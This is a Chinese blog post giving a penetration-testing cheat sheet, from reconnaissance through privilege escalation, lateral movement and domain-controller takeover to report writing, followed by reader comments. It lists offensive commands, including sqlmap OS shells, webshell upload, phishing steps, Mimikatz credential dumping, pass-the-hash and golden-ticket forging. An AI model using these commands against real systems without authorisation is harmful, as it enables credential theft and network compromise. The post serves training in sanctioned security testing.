AI智能摘要
AI 生成的文章内容摘要
一、渗透测试流程概览
信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写![]()
---
二、信息收集阶段
2.1 外网信息收集
# 子域名枚举 subfinder -d target.com -o subs.txt # 端口扫描 nmap -sS -sV -p- target.com # 目录扫描 dirsearch -u http://target.com -e php,html,js # 指纹识别 whatweb http://target.com
2.2 社工库查询
- 邮箱泄露查询:haveibeenpwned.com - 密码泄露查询:dehashed.com - 企业邮箱格式:theHarvester
---
三、初始访问
3.1 Web 漏洞利用
# 文件上传漏洞 # 上传 webshell 到 /uploads/shell.php # SQL 注入 sqlmap -u "http://target.com/page?id=1" --os-shell # RCE 漏洞 # Struts2、WebLogic、Fastjson 等
3.2 钓鱼攻击
1. 伪造登录页面 2. 发送钓鱼邮件 3. 获取员工凭证 4. VPN 登录内网
---
四、权限提升
4.1 Windows 提权
# 检查系统信息 systeminfo whoami /priv # 检查补丁 wmic qfe list # 查找可执行文件 accesschk.exe -uwcqv "Authenticated Users" * /accepteula
4.2 linux 提权
# 检查内核版本 uname -a # 检查 sudo 权限 sudo -l # 检查 SUID 文件 find / -perm -u=s -type f 2>/dev/null # 检查 cron 任务 cat /etc/crontab
---
五、横向移动
5.1 凭证窃取
# Mimikatz 抓取密码 mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords # 导出 hash mimikatz # lsadump::sam
5.2 传递攻击
# PtH(传递 hash) mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH # PtT(传递票据) mimikatz # kerberos::ptt admin.ccache
---
六、域控拿下
6.1 域信息收集
# 查看域信息 net domain nltest /domain_trusts # 查看域控 nltest /dclist:target.com # 查看域用户 net user /domain
6.2 黄金票据
# 获取 krbtgt hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt # 生成黄金票据 mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx
---
七、报告编写
7.1 报告结构
1. 执行摘要 2. 漏洞列表(按风险等级) 3. 详细利用过程 4. 修复建议 5. 附录(工具、命令)
---
作者:爪
分类:渗透测试
标签:内网渗透、域渗透、横向移动、提权技术、渗透测试
发布时间:2026-04-28

新西兰 1F
这权限提升细节太硬核了,我直接看懵了。
泰国 2F
感觉文章结构贼清晰,步步都跟得上。
日本 B1
@ 猎风者 确实,得这种清单式的才好查。
北京市 3F
linux那几条命令我试了报错,咋回事啊?
北京市 4F
这玩意儿真能拿到域控权限?细思极恐。
天津市 5F
作者列的工具必须靠谱,效率真高,666。
韩国 B1
@ 船夫江生 现在杀软更新快,很多得自己魔改才能用。
巴基斯坦 6F
外网信息收集这块我踩过坑,懂了懂了。
山东省济南市 B1
@ 烤冷面热心摊主 好奇踩了啥坑,是子域名没跑全吗?
韩国 7F
Windows提权步骤写得明明白白,佩服。
澳大利亚 8F
随便吐槽下,这报告模板可以复用。
辽宁省丹东市凤城市 9F
横向移动的凭证窃取听着就危险,捂脸。
湖北省武汉市 10F
新手小白路过,很多概念完全看不懂。
台湾省苗栗县 B1
@ 陨石诗人 多看几遍,建议先去搜搜基础命令。
上海市嘉定区 11F
accesschk在最新的Win11上还能跑通吗?
广东省揭阳市 12F
这Mimikatz也太猛了,感觉没法防御😂
上海市 13F
感觉列的工具太常规了,现在很多都被杀软秒了。
山东省淄博市 14F
以前碰到个服务器sudo权限配置极烂,直接一键root。
上海市 15F
有点意思。
山东省滨州市 16F
那Kerberoasting这块怎么搞?没看到写。
上海市 B1
@ 影之殇 得先搞定SPN,然后离线爆破,这块儿水深,建议搜搜专门的教程。
广东省深圳市 17F
最烦写报告了,技术活儿快,写文档能磨我一天,还得想怎么把漏洞描述得像那么回事,不然客户总觉得没干活。
浙江省宁波市 B1
@ 影锋 太真实了,我每次写报告都想直接把截图甩给客户,懒得写文字。
天津市 18F
那个subfinder怎么安装?我看文档没写清楚。
辽宁省鞍山市 19F
围观一下,感觉这行门槛挺高。
浙江省宁波市 20F
每次跑nmap都要跑半天,真的心累。
北京市 21F
确实,内网渗透最关键的就是权限提升。
江苏省泰州市靖江市 22F
之前在个项目里用mimikatz被抓了,现在得用更隐蔽的手段。
湖南省长沙市 23F
要是目标环境是全隔离的内网,这些工具怎么传进去?
山东省滨州市 24F
写得这么简单,真以为随便敲几个命令就能拿域控?
浙江省嘉兴市 25F
还行,能参考。
河南省鹤壁市 26F
太猛了,赶紧试试!
湖南省长沙市 27F
命令都是基础款,有没有新一点的玩法?
福建省厦门市 28F
我之前在公司做内网审计,发现很多服务器的sudo权限真的离谱,直接给了个全权限,完全不需要什么技巧就进去了,现在的运维意识真的得加强。
北京市 29F
Mimikatz那段看着有点慌,实操风险不小啊
浙江省 B1
@ 金角大王 实操得小心点